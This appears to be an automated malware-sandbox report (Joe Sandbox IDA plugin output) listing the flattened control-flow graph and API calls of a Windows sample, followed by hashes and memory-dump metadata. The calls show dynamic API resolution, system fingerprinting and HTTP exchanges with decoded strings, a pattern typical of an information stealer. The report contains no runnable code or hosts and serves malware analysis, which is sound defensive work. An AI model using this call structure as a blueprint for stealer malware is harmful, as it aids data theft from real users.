26517->26518 26519 443a78 26518->26519 26520 444a60 2 API calls 26519->26520 26521 443a8e 26520->26521 26522 444a60 2 API calls 26521->26522 26523 443aa4 26522->26523 26524 444a60 2 API calls 26523->26524 26525 443abd 26524->26525 26526 444a60 2 API calls 26525->26526 26527 443ad3 26526->26527 26528 444a60 2 API calls 26527->26528 26529 443ae9 26528->26529 26530 444a60 2 API calls 26529->26530 26531 443aff 26530->26531 26532 444a60 2 API calls 26531->26532 26533 443b15 26532->26533 26534 444a60 2 API calls 26533->26534 26535 443b2b 26534->26535 26536 444a60 2 API calls 26535->26536 26537 443b44 26536->26537 26538 444a60 2 API calls 26537->26538 26539 443b5a 26538->26539 26540 444a60 2 API calls 26539->26540 26541 443b70 26540->26541 26542 444a60 2 API calls 26541->26542 26543 443b86 26542->26543 26544 444a60 2 API calls 26543->26544 26545 443b9c 26544->26545 26546 444a60 2 API calls 26545->26546 26547 443bb2 26546->26547 26548 444a60 2 API calls 26547->26548 26549 443bcb 
26548->26549 26550 444a60 2 API calls 26549->26550 26551 443be1 26550->26551 26552 444a60 2 API calls 26551->26552 26553 443bf7 26552->26553 26554 444a60 2 API calls 26553->26554 26555 443c0d 26554->26555 26556 444a60 2 API calls 26555->26556 26557 443c23 26556->26557 26558 444a60 2 API calls 26557->26558 26559 443c39 26558->26559 26560 444a60 2 API calls 26559->26560 26561 443c52 26560->26561 26562 444a60 2 API calls 26561->26562 26563 443c68 26562->26563 26564 444a60 2 API calls 26563->26564 26565 443c7e 26564->26565 26566 444a60 2 API calls 26565->26566 26567 443c94 26566->26567 26568 444a60 2 API calls 26567->26568 26569 443caa 26568->26569 26570 444a60 2 API calls 26569->26570 26571 443cc0 26570->26571 26572 444a60 2 API calls 26571->26572 26573 443cd9 26572->26573 26574 444a60 2 API calls 26573->26574 26575 443cef 26574->26575 26576 444a60 2 API calls 26575->26576 26577 443d05 26576->26577 26578 444a60 2 API calls 26577->26578 26579 443d1b 26578->26579 26580 444a60 2 API calls 26579->26580 26581 443d31 26580->26581 26582 444a60 2 API calls 26581->26582 26583 443d47 26582->26583 26584 444a60 2 API calls 26583->26584 26585 443d60 26584->26585 26586 444a60 2 API calls 26585->26586 26587 443d76 26586->26587 26588 444a60 2 API calls 26587->26588 26589 443d8c 26588->26589 26590 444a60 2 API calls 26589->26590 26591 443da2 26590->26591 26592 444a60 2 API calls 26591->26592 26593 443db8 26592->26593 26594 444a60 2 API calls 26593->26594 26595 443dce 26594->26595 26596 444a60 2 API calls 26595->26596 26597 443de7 26596->26597 26598 444a60 2 API calls 26597->26598 26599 443dfd 26598->26599 26600 444a60 2 API calls 26599->26600 26601 443e13 26600->26601 26602 444a60 2 API calls 26601->26602 26603 443e29 26602->26603 26604 444a60 2 API calls 26603->26604 26605 443e3f 26604->26605 26606 444a60 2 API calls 26605->26606 26607 443e55 26606->26607 26608 444a60 2 API calls 26607->26608 26609 443e6e 26608->26609 26610 444a60 2 API calls 26609->26610 26611 443e84 26610->26611 
26612 444a60 2 API calls 26611->26612 26613 443e9a 26612->26613 26614 444a60 2 API calls 26613->26614 26615 443eb0 26614->26615 26616 444a60 2 API calls 26615->26616 26617 443ec6 26616->26617 26618 444a60 2 API calls 26617->26618 26619 443edc 26618->26619 26620 444a60 2 API calls 26619->26620 26621 443ef5 26620->26621 26622 444a60 2 API calls 26621->26622 26623 443f0b 26622->26623 26624 444a60 2 API calls 26623->26624 26625 443f21 26624->26625 26626 444a60 2 API calls 26625->26626 26627 443f37 26626->26627 26628 444a60 2 API calls 26627->26628 26629 443f4d 26628->26629 26630 444a60 2 API calls 26629->26630 26631 443f63 26630->26631 26632 444a60 2 API calls 26631->26632 26633 443f7c 26632->26633 26634 444a60 2 API calls 26633->26634 26635 443f92 26634->26635 26636 444a60 2 API calls 26635->26636 26637 443fa8 26636->26637 26638 444a60 2 API calls 26637->26638 26639 443fbe 26638->26639 26640 444a60 2 API calls 26639->26640 26641 443fd4 26640->26641 26642 444a60 2 API calls 26641->26642 26643 443fea 26642->26643 26644 444a60 2 API calls 26643->26644 26645 444003 26644->26645 26646 444a60 2 API calls 26645->26646 26647 444019 26646->26647 26648 444a60 2 API calls 26647->26648 26649 44402f 26648->26649 26650 444a60 2 API calls 26649->26650 26651 444045 26650->26651 26652 444a60 2 API calls 26651->26652 26653 44405b 26652->26653 26654 444a60 2 API calls 26653->26654 26655 444071 26654->26655 26656 444a60 2 API calls 26655->26656 26657 44408a 26656->26657 26658 444a60 2 API calls 26657->26658 26659 4440a0 26658->26659 26660 444a60 2 API calls 26659->26660 26661 4440b6 26660->26661 26662 444a60 2 API calls 26661->26662 26663 4440cc 26662->26663 26664 444a60 2 API calls 26663->26664 26665 4440e2 26664->26665 26666 444a60 2 API calls 26665->26666 26667 4440f8 26666->26667 26668 444a60 2 API calls 26667->26668 26669 444111 26668->26669 26670 444a60 2 API calls 26669->26670 26671 444127 26670->26671 26672 444a60 2 API calls 26671->26672 26673 44413d 26672->26673 26674 444a60 2 
API calls 26673->26674 26675 444153 26674->26675 26676 444a60 2 API calls 26675->26676 26677 444169 26676->26677 26678 444a60 2 API calls 26677->26678 26679 44417f 26678->26679 26680 444a60 2 API calls 26679->26680 26681 444198 26680->26681 26682 444a60 2 API calls 26681->26682 26683 4441ae 26682->26683 26684 444a60 2 API calls 26683->26684 26685 4441c4 26684->26685 26686 444a60 2 API calls 26685->26686 26687 4441da 26686->26687 26688 444a60 2 API calls 26687->26688 26689 4441f0 26688->26689 26690 444a60 2 API calls 26689->26690 26691 444206 26690->26691 26692 444a60 2 API calls 26691->26692 26693 44421f 26692->26693 26694 444a60 2 API calls 26693->26694 26695 444235 26694->26695 26696 444a60 2 API calls 26695->26696 26697 44424b 26696->26697 26698 444a60 2 API calls 26697->26698 26699 444261 26698->26699 26700 444a60 2 API calls 26699->26700 26701 444277 26700->26701 26702 444a60 2 API calls 26701->26702 26703 44428d 26702->26703 26704 444a60 2 API calls 26703->26704 26705 4442a6 26704->26705 26706 444a60 2 API calls 26705->26706 26707 4442bc 26706->26707 26708 444a60 2 API calls 26707->26708 26709 4442d2 26708->26709 26710 444a60 2 API calls 26709->26710 26711 4442e8 26710->26711 26712 444a60 2 API calls 26711->26712 26713 4442fe 26712->26713 26714 444a60 2 API calls 26713->26714 26715 444314 26714->26715 26716 444a60 2 API calls 26715->26716 26717 44432d 26716->26717 26718 444a60 2 API calls 26717->26718 26719 444343 26718->26719 26720 444a60 2 API calls 26719->26720 26721 444359 26720->26721 26722 444a60 2 API calls 26721->26722 26723 44436f 26722->26723 26724 444a60 2 API calls 26723->26724 26725 444385 26724->26725 26726 444a60 2 API calls 26725->26726 26727 44439b 26726->26727 26728 444a60 2 API calls 26727->26728 26729 4443b4 26728->26729 26730 444a60 2 API calls 26729->26730 26731 4443ca 26730->26731 26732 444a60 2 API calls 26731->26732 26733 4443e0 26732->26733 26734 444a60 2 API calls 26733->26734 26735 4443f6 26734->26735 26736 444a60 2 API calls 
26735->26736 26737 44440c 26736->26737 26738 444a60 2 API calls 26737->26738 26739 444422 26738->26739 26740 444a60 2 API calls 26739->26740 26741 44443b 26740->26741 26742 444a60 2 API calls 26741->26742 26743 444451 26742->26743 26744 444a60 2 API calls 26743->26744 26745 444467 26744->26745 26746 444a60 2 API calls 26745->26746 26747 44447d 26746->26747 26748 444a60 2 API calls 26747->26748 26749 444493 26748->26749 26750 444a60 2 API calls 26749->26750 26751 4444a9 26750->26751 26752 444a60 2 API calls 26751->26752 26753 4444c2 26752->26753 26754 444a60 2 API calls 26753->26754 26755 4444d8 26754->26755 26756 444a60 2 API calls 26755->26756 26757 4444ee 26756->26757 26758 444a60 2 API calls 26757->26758 26759 444504 26758->26759 26760 444a60 2 API calls 26759->26760 26761 44451a 26760->26761 26762 444a60 2 API calls 26761->26762 26763 444530 26762->26763 26764 444a60 2 API calls 26763->26764 26765 444549 26764->26765 26766 444a60 2 API calls 26765->26766 26767 44455f 26766->26767 26768 444a60 2 API calls 26767->26768 26769 444575 26768->26769 26770 444a60 2 API calls 26769->26770 26771 44458b 26770->26771 26772 444a60 2 API calls 26771->26772 26773 4445a1 26772->26773 26774 444a60 2 API calls 26773->26774 26775 4445b7 26774->26775 26776 444a60 2 API calls 26775->26776 26777 4445d0 26776->26777 26778 444a60 2 API calls 26777->26778 26779 4445e6 26778->26779 26780 444a60 2 API calls 26779->26780 26781 4445fc 26780->26781 26782 444a60 2 API calls 26781->26782 26783 444612 26782->26783 26784 444a60 2 API calls 26783->26784 26785 444628 26784->26785 26786 444a60 2 API calls 26785->26786 26787 44463e 26786->26787 26788 444a60 2 API calls 26787->26788 26789 444657 26788->26789 26790 444a60 2 API calls 26789->26790 26791 44466d 26790->26791 26792 444a60 2 API calls 26791->26792 26793 444683 26792->26793 26794 444a60 2 API calls 26793->26794 26795 444699 26794->26795 26796 444a60 2 API calls 26795->26796 26797 4446af 26796->26797 26798 444a60 2 API calls 26797->26798 
26799 4446c5 26798->26799 26800 444a60 2 API calls 26799->26800 26801 4446de 26800->26801 26802 444a60 2 API calls 26801->26802 26803 4446f4 26802->26803 26804 444a60 2 API calls 26803->26804 26805 44470a 26804->26805 26806 444a60 2 API calls 26805->26806 26807 444720 26806->26807 26808 444a60 2 API calls 26807->26808 26809 444736 26808->26809 26810 444a60 2 API calls 26809->26810 26811 44474c 26810->26811 26812 444a60 2 API calls 26811->26812 26813 444765 26812->26813 26814 444a60 2 API calls 26813->26814 26815 44477b 26814->26815 26816 444a60 2 API calls 26815->26816 26817 444791 26816->26817 26818 444a60 2 API calls 26817->26818 26819 4447a7 26818->26819 26820 444a60 2 API calls 26819->26820 26821 4447bd 26820->26821 26822 444a60 2 API calls 26821->26822 26823 4447d3 26822->26823 26824 444a60 2 API calls 26823->26824 26825 4447ec 26824->26825 26826 444a60 2 API calls 26825->26826 26827 444802 26826->26827 26828 444a60 2 API calls 26827->26828 26829 444818 26828->26829 26830 444a60 2 API calls 26829->26830 26831 44482e 26830->26831 26832 444a60 2 API calls 26831->26832 26833 444844 26832->26833 26834 444a60 2 API calls 26833->26834 26835 44485a 26834->26835 26836 444a60 2 API calls 26835->26836 26837 444873 26836->26837 26838 444a60 2 API calls 26837->26838 26839 444889 26838->26839 26840 444a60 2 API calls 26839->26840 26841 44489f 26840->26841 26842 444a60 2 API calls 26841->26842 26843 4448b5 26842->26843 26844 444a60 2 API calls 26843->26844 26845 4448cb 26844->26845 26846 444a60 2 API calls 26845->26846 26847 4448e1 26846->26847 26848 444a60 2 API calls 26847->26848 26849 4448fa 26848->26849 26850 444a60 2 API calls 26849->26850 26851 444910 26850->26851 26852 444a60 2 API calls 26851->26852 26853 444926 26852->26853 26854 444a60 2 API calls 26853->26854 26855 44493c 26854->26855 26856 444a60 2 API calls 26855->26856 26857 444952 26856->26857 26858 444a60 2 API calls 26857->26858 26859 444968 26858->26859 26860 444a60 2 API calls 26859->26860 26861 444981 
26860->26861 26862 444a60 2 API calls 26861->26862 26863 444997 26862->26863 26864 444a60 2 API calls 26863->26864 26865 4449ad 26864->26865 26866 444a60 2 API calls 26865->26866 26867 4449c3 26866->26867 26868 444a60 2 API calls 26867->26868 26869 4449d9 26868->26869 26870 444a60 2 API calls 26869->26870 26871 4449ef 26870->26871 26872 444a60 2 API calls 26871->26872 26873 444a08 26872->26873 26874 444a60 2 API calls 26873->26874 26875 444a1e 26874->26875 26876 444a60 2 API calls 26875->26876 26877 444a34 26876->26877 26878 444a60 2 API calls 26877->26878 26879 444a4a 26878->26879 26880 4666e0 26879->26880 26881 466afe 8 API calls 26880->26881 26882 4666ed 43 API calls 26880->26882 26883 466b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26881->26883 26884 466c08 26881->26884 26882->26881 26883->26884 26885 466c15 8 API calls 26884->26885 26886 466cd2 26884->26886 26885->26886 26887 466d4f 26886->26887 26888 466cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26886->26888 26889 466d5c 6 API calls 26887->26889 26890 466de9 26887->26890 26888->26887 26889->26890 26891 466df6 12 API calls 26890->26891 26892 466f10 26890->26892 26891->26892 26893 466f8d 26892->26893 26894 466f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26892->26894 26895 466f96 GetProcAddress GetProcAddress 26893->26895 26896 466fc1 26893->26896 26894->26893 26895->26896 26897 466ff5 26896->26897 26898 466fca GetProcAddress GetProcAddress 26896->26898 26899 467002 10 API calls 26897->26899 26900 4670ed 26897->26900 26898->26897 26899->26900 26901 4670f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26900->26901 26902 467152 26900->26902 26901->26902 26903 46716e 26902->26903 26904 46715b GetProcAddress 26902->26904 26905 467177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26903->26905 26906 46051f 26903->26906 26904->26903 26905->26906 26907 441530 26906->26907 27216 441610 
26907->27216 26909 44153b 26910 441555 lstrcpy 26909->26910 26911 44155d 26909->26911 26910->26911 26912 441577 lstrcpy 26911->26912 26913 44157f 26911->26913 26912->26913 26914 441599 lstrcpy 26913->26914 26916 4415a1 26913->26916 26914->26916 26915 441605 26918 45f1b0 lstrlen 26915->26918 26916->26915 26917 4415fd lstrcpy 26916->26917 26917->26915 26919 45f1e4 26918->26919 26920 45f1f7 lstrlen 26919->26920 26921 45f1eb lstrcpy 26919->26921 26922 45f208 26920->26922 26921->26920 26923 45f20f lstrcpy 26922->26923 26924 45f21b lstrlen 26922->26924 26923->26924 26925 45f22c 26924->26925 26926 45f233 lstrcpy 26925->26926 26927 45f23f 26925->26927 26926->26927 26928 45f258 lstrcpy 26927->26928 26929 45f264 26927->26929 26928->26929 26930 45f286 lstrcpy 26929->26930 26931 45f292 26929->26931 26930->26931 26932 45f2ba lstrcpy 26931->26932 26933 45f2c6 26931->26933 26932->26933 26934 45f2ea lstrcpy 26933->26934 26985 45f300 26933->26985 26934->26985 26935 45f30c lstrlen 26935->26985 26936 45f4b9 lstrcpy 26936->26985 26937 45f3a1 lstrcpy 26937->26985 26938 45f3c5 lstrcpy 26938->26985 26939 441530 8 API calls 26939->26985 26940 45f4e8 lstrcpy 26999 45f4f0 26940->26999 26941 45ee90 28 API calls 26941->26985 26942 45f479 lstrcpy 26942->26985 26943 45f70f StrCmpCA 26949 45fe8e 26943->26949 26943->26985 26944 45f616 StrCmpCA 26944->26943 26944->26999 26945 45f59c lstrcpy 26945->26999 26946 45fa29 StrCmpCA 26956 45fe2b 26946->26956 26946->26985 26947 45f73e lstrlen 26947->26985 26948 45fd4d StrCmpCA 26952 45fd60 Sleep 26948->26952 26963 45fd75 26948->26963 26950 45fead lstrlen 26949->26950 26951 45fea5 lstrcpy 26949->26951 26955 45fec7 26950->26955 26951->26950 26952->26985 26953 45fa58 lstrlen 26953->26985 26954 45f64a lstrcpy 26954->26999 26961 45fee7 lstrlen 26955->26961 26966 45fedf lstrcpy 26955->26966 26957 45fe4a lstrlen 26956->26957 26958 45fe42 lstrcpy 26956->26958 26965 45fe64 26957->26965 26958->26957 26959 45ee90 28 API calls 26959->26999 26960 45f89e lstrcpy 
26960->26985 26976 45ff01 26961->26976 26962 45fd94 lstrlen 26978 45fdae 26962->26978 26963->26962 26967 45fd8c lstrcpy 26963->26967 26964 45f76f lstrcpy 26964->26985 26970 45fdce lstrlen 26965->26970 26972 45fe7c lstrcpy 26965->26972 26966->26961 26967->26962 26968 45fbb8 lstrcpy 26968->26985 26969 45fa89 lstrcpy 26969->26985 26986 45fde8 26970->26986 26971 45f8cd lstrcpy 26971->26999 26972->26970 26973 45f791 lstrcpy 26973->26985 26975 441530 8 API calls 26975->26999 26977 45ff21 26976->26977 26980 45ff19 lstrcpy 26976->26980 26981 441610 4 API calls 26977->26981 26978->26970 26984 45fdc6 lstrcpy 26978->26984 26979 45fbe7 lstrcpy 26979->26999 26980->26977 27002 45fe13 26981->27002 26982 45faab lstrcpy 26982->26985 26983 45f698 lstrcpy 26983->26999 26984->26970 26985->26935 26985->26936 26985->26937 26985->26938 26985->26939 26985->26940 26985->26941 26985->26942 26985->26943 26985->26946 26985->26947 26985->26948 26985->26953 26985->26960 26985->26964 26985->26968 26985->26969 26985->26971 26985->26973 26985->26979 26985->26982 26991 45f7e2 lstrcpy 26985->26991 26994 45fafc lstrcpy 26985->26994 26985->26999 26987 45fe08 26986->26987 26989 45fe00 lstrcpy 26986->26989 26990 441610 4 API calls 26987->26990 26988 45efb0 35 API calls 26988->26999 26989->26987 26990->27002 26991->26985 26992 45f924 lstrcpy 26992->26999 26993 45f99e StrCmpCA 26993->26946 26993->26999 26994->26985 26995 45fc3e lstrcpy 26995->26999 26996 45fcb8 StrCmpCA 26996->26948 26996->26999 26997 45f9cb lstrcpy 26997->26999 26998 45fce9 lstrcpy 26998->26999 26999->26944 26999->26945 26999->26946 26999->26948 26999->26954 26999->26959 26999->26975 26999->26983 26999->26985 26999->26988 26999->26992 26999->26993 26999->26995 26999->26996 26999->26997 26999->26998 27000 45fa19 lstrcpy 26999->27000 27001 45fd3a lstrcpy 26999->27001 27000->26999 27001->26999 27002->26026 27004 462785 27003->27004 27005 46278c GetVolumeInformationA 27003->27005 27004->27005 27006 4627ec GetProcessHeap RtlAllocateHeap 
27005->27006 27008 462826 wsprintfA 27006->27008 27009 462822 27006->27009 27008->27009 27226 4671e0 27009->27226 27013 444c70 27012->27013 27014 444c85 27013->27014 27015 444c7d lstrcpy 27013->27015 27230 444bc0 27014->27230 27015->27014 27017 444c90 27018 444ccc lstrcpy 27017->27018 27019 444cd8 27017->27019 27018->27019 27020 444cff lstrcpy 27019->27020 27021 444d0b 27019->27021 27020->27021 27022 444d2f lstrcpy 27021->27022 27023 444d3b 27021->27023 27022->27023 27024 444d6d lstrcpy 27023->27024 27025 444d79 27023->27025 27024->27025 27026 444da0 lstrcpy 27025->27026 27027 444dac InternetOpenA StrCmpCA 27025->27027 27026->27027 27028 444de0 27027->27028 27029 4454b8 InternetCloseHandle CryptStringToBinaryA 27028->27029 27234 463e70 27028->27234 27031 4454e8 LocalAlloc 27029->27031 27035 4455d8 27029->27035 27032 4454ff CryptStringToBinaryA 27031->27032 27031->27035 27033 445517 LocalFree 27032->27033 27034 445529 lstrlen 27032->27034 27033->27035 27036 44553d 27034->27036 27035->26055 27039 445557 lstrcpy 27036->27039 27040 445563 lstrlen 27036->27040 27037 444e38 27042 444e5a lstrcpy 27037->27042 27044 444e62 27037->27044 27038 444dfa 27038->27037 27041 444e23 lstrcpy lstrcat 27038->27041 27039->27040 27043 44557d 27040->27043 27041->27037 27042->27044 27045 44558f lstrcpy lstrcat 27043->27045 27046 4455a2 27043->27046 27047 444e71 lstrlen 27044->27047 27045->27046 27048 4455d1 27046->27048 27050 4455c9 lstrcpy 27046->27050 27049 444e89 27047->27049 27048->27035 27051 444e95 lstrcpy lstrcat 27049->27051 27052 444eac 27049->27052 27050->27048 27051->27052 27053 444ed5 27052->27053 27054 444ecd lstrcpy 27052->27054 27055 444edc lstrlen 27053->27055 27054->27053 27056 444ef2 27055->27056 27057 444efe lstrcpy lstrcat 27056->27057 27058 444f15 27056->27058 27057->27058 27059 444f36 lstrcpy 27058->27059 27060 444f3e 27058->27060 27059->27060 27061 444f65 lstrcpy lstrcat 27060->27061 27062 444f7b 27060->27062 27061->27062 27063 444fa4 27062->27063 27064 444f9c 
lstrcpy 27062->27064 27065 444fab lstrlen 27063->27065 27064->27063 27066 444fc1 27065->27066 27067 444fcd lstrcpy lstrcat 27066->27067 27068 444fe4 27066->27068 27067->27068 27069 44500d 27068->27069 27070 445005 lstrcpy 27068->27070 27071 445014 lstrlen 27069->27071 27070->27069 27072 44502a 27071->27072 27073 445036 lstrcpy lstrcat 27072->27073 27074 44504d 27072->27074 27073->27074 27075 445079 27074->27075 27076 445071 lstrcpy 27074->27076 27077 445080 lstrlen 27075->27077 27076->27075 27078 44509b 27077->27078 27079 4450ac lstrcpy lstrcat 27078->27079 27080 4450bc 27078->27080 27079->27080 27081 4450da lstrcpy lstrcat 27080->27081 27082 4450ed 27080->27082 27081->27082 27083 44510b lstrcpy 27082->27083 27084 445113 27082->27084 27083->27084 27085 445121 InternetConnectA 27084->27085 27085->27029 27086 445150 HttpOpenRequestA 27085->27086 27087 4454b1 InternetCloseHandle 27086->27087 27088 44518b 27086->27088 27087->27029 27241 467310 lstrlen 27088->27241 27092 4451a4 27249 4672c0 27092->27249 27095 467280 lstrcpy 27096 4451c0 27095->27096 27097 467310 3 API calls 27096->27097 27098 4451d5 27097->27098 27099 467280 lstrcpy 27098->27099 27100 4451de 27099->27100 27101 467310 3 API calls 27100->27101 27102 4451f4 27101->27102 27103 467280 lstrcpy 27102->27103 27104 4451fd 27103->27104 27105 467310 3 API calls 27104->27105 27106 445213 27105->27106 27107 467280 lstrcpy 27106->27107 27108 44521c 27107->27108 27109 467310 3 API calls 27108->27109 27110 445231 27109->27110 27111 467280 lstrcpy 27110->27111 27112 44523a 27111->27112 27113 4672c0 2 API calls 27112->27113 27114 44524d 27113->27114 27115 467280 lstrcpy 27114->27115 27116 445256 27115->27116 27117 467310 3 API calls 27116->27117 27118 44526b 27117->27118 27119 467280 lstrcpy 27118->27119 27120 445274 27119->27120 27121 467310 3 API calls 27120->27121 27122 445289 27121->27122 27123 467280 lstrcpy 27122->27123 27124 445292 27123->27124 27125 4672c0 2 API calls 27124->27125 27126 4452a5 27125->27126 27127 
467280 lstrcpy 27126->27127 27128 4452ae 27127->27128 27129 467310 3 API calls 27128->27129 27130 4452c3 27129->27130 27131 467280 lstrcpy 27130->27131 27132 4452cc 27131->27132 27133 467310 3 API calls 27132->27133 27134 4452e2 27133->27134 27135 467280 lstrcpy 27134->27135 27136 4452eb 27135->27136 27137 467310 3 API calls 27136->27137 27138 445301 27137->27138 27139 467280 lstrcpy 27138->27139 27140 44530a 27139->27140 27141 467310 3 API calls 27140->27141 27142 44531f 27141->27142 27143 467280 lstrcpy 27142->27143 27144 445328 27143->27144 27145 4672c0 2 API calls 27144->27145 27146 44533b 27145->27146 27147 467280 lstrcpy 27146->27147 27148 445344 27147->27148 27149 445370 lstrcpy 27148->27149 27150 44537c 27148->27150 27149->27150 27151 4672c0 2 API calls 27150->27151 27152 44538a 27151->27152 27153 4672c0 2 API calls 27152->27153 27154 445397 27153->27154 27155 467280 lstrcpy 27154->27155 27156 4453a1 27155->27156 27157 4453b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27156->27157 27158 44549c InternetCloseHandle 27157->27158 27162 4453f2 27157->27162 27160 4454ae 27158->27160 27159 4453fd lstrlen 27159->27162 27160->27087 27161 44542e lstrcpy lstrcat 27161->27162 27162->27158 27162->27159 27162->27161 27163 445473 27162->27163 27164 44546b lstrcpy 27162->27164 27165 44547a InternetReadFile 27163->27165 27164->27163 27165->27158 27165->27162 27167 458cc6 ExitProcess 27166->27167 27168 458ccd 27166->27168 27169 458ee2 27168->27169 27170 458d84 StrCmpCA 27168->27170 27171 458da4 StrCmpCA 27168->27171 27172 458d06 lstrlen 27168->27172 27173 458e6f StrCmpCA 27168->27173 27174 458e88 lstrlen 27168->27174 27175 458e56 StrCmpCA 27168->27175 27176 458d30 lstrlen 27168->27176 27177 458dbd StrCmpCA 27168->27177 27178 458ddd StrCmpCA 27168->27178 27179 458dfd StrCmpCA 27168->27179 27180 458e1d StrCmpCA 27168->27180 27181 458e3d StrCmpCA 27168->27181 27182 458d5a lstrlen 27168->27182 27183 458ebb lstrcpy 27168->27183 27169->26057 27170->27168 27171->27168 
27172->27168 27173->27168 27174->27168 27175->27168 27176->27168 27177->27168 27178->27168 27179->27168 27180->27168 27181->27168 27182->27168 27183->27168 27184->26063 27185->26065 27186->26071 27187->26073 27188->26079 27189->26081 27190->26087 27191->26091 27192->26097 27193->26099 27194->26103 27195->26117 27196->26121 27197->26120 27198->26116 27199->26120 27200->26138 27201->26123 27202->26124 27203->26128 27204->26134 27205->26135 27206->26142 27207->26145 27208->26151 27209->26174 27210->26178 27211->26177 27212->26173 27213->26177 27214->26187 27217 44161f 27216->27217 27218 44162b lstrcpy 27217->27218 27219 441633 27217->27219 27218->27219 27220 44164d lstrcpy 27219->27220 27221 441655 27219->27221 27220->27221 27222 44166f lstrcpy 27221->27222 27224 441677 27221->27224 27222->27224 27223 441699 27223->26909 27224->27223 27225 441691 lstrcpy 27224->27225 27225->27223 27227 4671e6 27226->27227 27228 462860 27227->27228 27229 4671fc lstrcpy 27227->27229 27228->26052 27229->27228 27231 444bd0 27230->27231 27231->27231 27232 444bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27231->27232 27233 444c41 27232->27233 27233->27017 27235 463e83 27234->27235 27236 463e9f lstrcpy 27235->27236 27237 463eab 27235->27237 27236->27237 27238 463ed5 GetSystemTime 27237->27238 27239 463ecd lstrcpy 27237->27239 27240 463ef3 27238->27240 27239->27238 27240->27038 27242 46732d 27241->27242 27243 44519b 27242->27243 27244 46733d lstrcpy lstrcat 27242->27244 27245 467280 27243->27245 27244->27243 27246 46728c 27245->27246 27247 4672b4 27246->27247 27248 4672ac lstrcpy 27246->27248 27247->27092 27248->27247 27250 4672dc 27249->27250 27251 4451b7 27250->27251 27252 4672ef lstrcpy lstrcat 27250->27252 27251->27095 27252->27251 27280 4631f0 GetSystemInfo wsprintfA 27265 45e0f9 140 API calls 27294 456b79 138 API calls 27285 45f2f8 93 API calls 27295 441b64 162 API calls 27306 44bbf9 90 API calls 27266 462880 10 API calls 27267 464480 OpenProcess GetModuleFileNameExA 
CloseHandle lstrcpy 27268 463480 6 API calls 27286 463280 7 API calls 27269 458c88 16 API calls 27296 44b309 98 API calls 27277 464e35 6 API calls 27260 462c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27297 469711 10 API calls __setmbcp 27270 46749e memset ctype 27272 452499 290 API calls 27307 44db99 672 API calls 27308 458615 47 API calls 27273 4630a0 GetSystemPowerStatus 27281 4629a0 GetCurrentProcess IsWow64Process 27299 454b29 304 API calls 27309 4523a9 298 API calls 27278 463130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27310 45abb2 120 API calls 27284 44f639 144 API calls 27287 4416b9 200 API calls 27302 44bf39 177 API calls
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 00444C7F
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00444CD2
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00444D05
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00444D35
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00444D73
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00444DA6
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00444DB6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$InternetOpen
                        • String ID: "$------
                        • API String ID: 2041821634-2370822465
                        • Opcode ID: 352dc44aeabd182fd41edc13286175836e8bf4ee3eadada1a92ad58e6b7a3f61
                        • Instruction ID: c9eeb7530a248753ec1eea875f82cb8b0079acddea30bcfb79c2ecf30127ee26
                        • Opcode Fuzzy Hash: 352dc44aeabd182fd41edc13286175836e8bf4ee3eadada1a92ad58e6b7a3f61
                        • Instruction Fuzzy Hash: 6752A171A112169BEB21EFB5CC49BAFB7B9AF44314F14402AF805A7351DB78DC41CBA8

                        Control-flow Graph

                        • Executed
                        • Not Executed
